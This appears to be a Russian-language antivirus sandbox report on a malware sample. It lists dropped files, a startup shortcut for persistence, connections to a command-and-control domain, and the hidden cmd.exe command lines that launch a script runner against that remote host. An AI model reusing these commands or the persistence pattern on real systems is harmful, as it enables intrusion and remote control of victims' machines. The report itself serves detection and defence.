Техническая информация
Для обеспечения автозапуска и распространения
Создает или изменяет следующие файлы
- %TEMP%\sppedup.lnk
Изменения в файловой системе
Создает следующие файлы
- %TEMP%\rvbgosbx.js
- %TEMP%\password.txt
- C:\users\public\csrc.exe
- %TEMP%\sppedup.lnk
Сетевая активность
Подключается к
- 'wp#.##sonline.co':443
- 'microsoft.com':80
TCP
Запросы HTTP GET
- http://www.microsoft.com/pki/certs/MicRooCerAut_2010-06-23.crt
Другие
- 'wp#.##sonline.co':443
UDP
- DNS ASK wp#.##sonline.co
- DNS ASK microsoft.com
Другое
Создает и запускает на исполнение
- 'C:\users\public\csrc.exe' "%TEMP%\rvbgosbx.js" wps.wpsonline.co/ 1
- 'C:\users\public\csrc.exe' "%TEMP%\rvbgosbx.js" wps.wpsonline.co/ 2
- '%WINDIR%\syswow64\cmd.exe' /C "ECHO profitshare2022> %TEMP%\Password.txt & NOTEPAD.EXE %TEMP%\Password.txt & DEL %TEMP%\Password.txt"' (со скрытым окном)
- '%WINDIR%\syswow64\cmd.exe' /c start /b C:\Users\Public\csrc.exe "%TEMP%\rvbgosbx.js" wps.wpsonline.co/ 1 & start /b C:\Users\Public\csrc.exe "%TEMP%\rvbgosbx.js" wps.wpsonline.co/ 2 & move "%TEMP%\SppedUp.lnk" "%APPDATA%...' (со скрытым окном)
Запускает на исполнение
- '%WINDIR%\syswow64\cmd.exe' /C "ECHO profitshare2022> %TEMP%\Password.txt & NOTEPAD.EXE %TEMP%\Password.txt & DEL %TEMP%\Password.txt"
- '%WINDIR%\syswow64\notepad.exe' %TEMP%\Password.txt
- '%WINDIR%\syswow64\cmd.exe' /c start /b C:\Users\Public\csrc.exe "%TEMP%\rvbgosbx.js" wps.wpsonline.co/ 1 & start /b C:\Users\Public\csrc.exe "%TEMP%\rvbgosbx.js" wps.wpsonline.co/ 2 & move "%TEMP%\SppedUp.lnk" "%APPDATA%...
